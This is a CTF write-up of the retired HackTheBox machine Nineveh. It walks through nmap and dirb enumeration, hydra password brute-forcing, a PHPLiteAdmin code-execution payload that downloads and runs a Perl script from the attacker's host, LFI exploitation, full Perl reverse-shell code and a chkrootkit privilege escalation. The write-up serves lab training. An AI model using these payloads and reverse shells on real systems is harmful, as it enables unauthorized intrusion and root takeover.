Nineveh machine on the hackthebox has retired. It was the linux VM which can be considered as the intermediate level box. Getting the flag (both user and system) was considered to be “Hard“.

Note: In order to keep all my CTF write ups crisp and concise, I only mention the steps which led to positive results. There were lot of trial and error and hours or in some case even days of failed attempts before reaching to the correct solution. For this challenge, IP address of my machine was 10.10.14.34 and nineveh was 10.10.10.43

Reconnaissance

I started with nmap to check for all open ports (-p-), version of services running (-sV) and perform script scans using default set of scripts (-sC)

nmap -sC -sV -p- 10.10.10.43 1 nmap - sC - sV - p - 10.10.10.43

1 2 3 4 5 6 7 8 9 10 11 80 / tcp open http Apache httpd 2.4.18 ( ( Ubuntu ) ) | _http - server - header : Apache / 2.4.18 ( Ubuntu ) | _http - title : Site doesn 't have a title (text/html). 443/tcp open ssl/http Apache httpd 2.4.18 ((Ubuntu)) |_http-server-header: Apache/2.4.18 (Ubuntu) |_http-title: Site doesn' t have a title ( text / html ) . | ssl - cert : Subject : commonName = nineveh . htb / organizationName = HackTheBox Ltd / stateOrProvinceName = Athens / countryName = GR | Not valid before : 2017 - 07 - 01T15 : 03 : 30 | _Not valid after : 2018 - 07 - 01T15 : 03 : 30 | _ssl - date : TLS randomness does not represent time

Since both port 80 and port 443 was open, I started dirb to enumerate through the directories using dirb http://10.10.10.43/ for port 80 and dirb https://10.10.10.43/ for SSL.

The output of dirb revealed two hidden webpages https://10.10.10.43/db and http://10.10.10.43/department/login.php. On navigating to the directory /db, there was the phpliteadmin login page.



Also, I checked for the SSL certificate and found some useful information. The username “admin” was later found to useful.









Exploitation

PHPLiteAdmin 1.9.3 has the remote code execution vulnerability whose details can be found here. In order to exploit this vulnerability, the access to the admin console was required. Since I didn’t had the password, I used hydra to brute force the password.

hydra -v 10.10.10.43 https-form-post "/db/index.php:password=^PASS^&login=Log+In&proc_login=true:F=Incorrect password" -l '' -P /usr/share/wordlists/rockyou.txt -t 10 -w 30 1 hydra - v 10.10.10.43 https - form - post "/db/index.php:password=^PASS^&login=Log+In&proc_login=true:F=Incorrect password" - l '' - P / usr / share / wordlists / rockyou .txt - t 10 - w 30

After few minutes, brute force attempt was successful and I got the admin password.



Uploading Reverse Shell

On logging in, there was the admin console which allowed to create the databases and tables. I created a new database with name “ninevehNotes.php“. There was a reason to create the database with this particular name which I will explain later.



I selected the newly created database and created the new table with 1 field. For the exploit to work, table name didn’t mattered so it can be anything. Make note of the “Path to database” in the below image. It is the location where our database will be stored. It is important because, it will be used later to execute the arbitrary command. The database is stored in the directory /var/tmp

Now came the interesting part. To upload the shell, the field type should be set to “text” and default value to be the command which needs to be executed. Here the field name can be anything. I used the default value as <?php system(“wget -O /tmp/shell.pl http://10.10.14.34:8000/shell.pl;perl /tmp/shell.pl”);> which will upload the reverse shell from my system(10.10.14.34) to the victim’s /tmp directory and execute it.

On my machine, I created a perl reverse shell shell.pl

use Socket; $i="10.10.14.34"; $p=80; socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp")); if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S"); open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");}; 1 2 3 4 5 6 use Socket ; $i = "10.10.14.34" ; $p = 80 ; socket ( S , PF_INET , SOCK_STREAM , getprotobyname ( "tcp" ) ) ; if ( connect ( S , sockaddr_in ( $p , inet_aton ( $i ) ) ) ) { open ( STDIN , ">&S" ) ; open ( STDOUT , ">&S" ) ; open ( STDERR , ">&S" ) ; exec ( "/bin/sh -i" ) ; } ;

I opened the netcat listener on port 80 using nc -nlvp 80 to get the shell back from the victim.

Getting the reverse shell

The next goal was to somehow access the database ninevehNotes.php to perform arbitrary command execution. Since the database was saved in /var/tmp directory, it was not possible to access it from the current webpage. Then I switched to the other login page found by dirb which was http://10.10.10.43/department/login.php Again I used hydra with username as admin (found earlier from SSL the certificate).

hydra -v 10.10.10.43 http-form-post "/department/login.php:username=^USER^&password=^PASS^:F=Invalid Password!" -l 'admin' -P /usr/share/wordlists/rockyou.txt -t 10 -w 30 1 hydra - v 10.10.10.43 http - form - post "/department/login.php:username=^USER^&password=^PASS^:F=Invalid Password!" - l 'admin' - P / usr / share / wordlists / rockyou .txt - t 10 - w 30

This time also, hydra was successful to guess the correct password



I logged in to the application. There was the notes tab which directed to the URL http:/10.10.10.43/department/manage.php?notes=ninevehNotes.txt and printed the content of the file ninevehNotes.txt. I tested for Local File Inclusion (LFI) vulnerability on the notes parameter and after many trials and error and properly analyzing the error messages, I found that it was indeed vulnerable to LFI. The catch here was that the file which needs to be accessed must contain the word “ninevehNotes” in it. This was the reason I earlier named the database file as ninevehNotes.php. The application was vulnerable to LFI which was the good news because now I can access the database and execute the arbitrary command. I used the url http://10.10.10.43/department/manage.php?notes=/var/tmp/ninevehNotes.php and got the successful code execution !!! My reverse shell was uploaded on the victim, it was executed there returned back the shell 🙂

Post Exploitation

The shell which I got was for the user www-data. I moved to the web application directory to check for any hidden directories which might have been missed by dirb. Inside the folder /var/www/ssl there was the directory secure_notes. Using the browser, I navigated to the url https://10.10.10.43/secure_notes It opened the page with a very slow loading image. I downloaded the image and saved on my local system. The image size was around 3MB. I found it to be a bit suspicious and used strings to look for any information hidden inside it.

strings secure_notes.png > secure_notes.txt 1 strings secure_notes .png > secure_notes .txt

And indeed, there was the SSH RSA key pair for the user amrois hidden inside the image.



I saved the RSA private key in the file id_rsa and transferred to the victim using wget.

I used netstat to check if the victim is listening for SSH connection.

netstat -antp 1 netstat - antp

1 2 3 4 5 6 7 8 9 10 11 Proto Recv - Q Send - Q Local Address Foreign Address State PID / Program name tcp 0 0 0.0.0.0 : 80 0.0.0.0 : * LISTEN - tcp 0 0 0.0.0.0 : 22 0.0.0.0 : * LISTEN - tcp 0 0 0.0.0.0 : 443 0.0.0.0 : * LISTEN - tcp 0 125 10.10.10.43 : 44788 10.10.14.34 : 80 ESTABLISHED 4931 / netstat tcp 0 0 10.10.10.43 : 35434 10.10.14.59 : 1337 ESTABLISHED 5322 / nc tcp 1 0 10.10.10.43 : 80 10.10.14.34 : 57114 CLOSE_WAIT - tcp 0 0 10.10.10.43 : 80 10.10.14.59 : 42246 ESTABLISHED - tcp6 0 0 :: : 22 :: : * LISTEN -

The host was listening on port 22, but the firewall was restricting the SSH connections from external IPs (I checked iptables). Users on the local machine can only login via SSH. Inside the victim shell, I used the private key (id_rsa) to ssh as the armois.

ssh -o StrictHostKeyChecking=no -i id_rsa amrois@nineveh.htb 1 ssh - o StrictHostKeyChecking = no - i id_rsa amrois @ nineveh .htb

I was successfully able to login as armois and was able to read user flag.







Privilege Escalation

I checked the files/folders in the root directory and found something strange.



There was the folder “report” owned by user amrois. Inside the folder some reports were being constantly generated which means some cron jobs might be running. I checked the content of one of the report which had the string “Searching for Suckit rootkit… Warning: /sbin/init INFECTED” Doing the quick google search I came across this link. The output was generated from by chkrootkit command. I checked for the exploits related to chrootkit and found one which allowed Local Privilege Escalation. The exploit details can be found here. I created the perl reverse shell script root.pl in /tmp directory and created the listiner on my local machine on port 5555

#!/usr/bin/perl use Socket; $i="10.10.14.34"; $p=5555;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp")); if(connect(S,sockaddr_in($p,inet_aton($i)))) { open(STDIN,">&S"); open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i"); }; 1 2 3 4 5 6 7 8 9 #!/usr/bin/perl use Socket ; $i = "10.10.14.34" ; $p = 5555 ; socket ( S , PF_INET , SOCK_STREAM , getprotobyname ( "tcp" ) ) ; if ( connect ( S , sockaddr_in ( $p , inet_aton ( $i ) ) ) ) { open ( STDIN , ">&S" ) ; open ( STDOUT , ">&S" ) ; open ( STDERR , ">&S" ) ; exec ( "/bin/sh -i" ) ; } ;

I made the script executable using chmod +x root.pl and waited for the cron job to run again. After few seconds I had the root shell 😀



Final note

This machine was of moderate difficulty. It is very important to enumerate all web directories both for port 80 and port 443 if open for the hidden directories (here for remote code execution). As a pentester it is important to perform fuzzing of the inputs and do proper analysis of error messages (creating database with name as ninevehNotes.php ). Analyze the images for hidden content (SSH keys stored in images). Do proper enumeration after getting the shell (netstat to check for internal listening ports)

I hope this write-up was helpful. Share this if you found it useful. If you have any questions or suggestions please leave you comments. Subscribe to the mailing list to get updates for my future CTF write-ups and blogs.

Happy Learning 🙂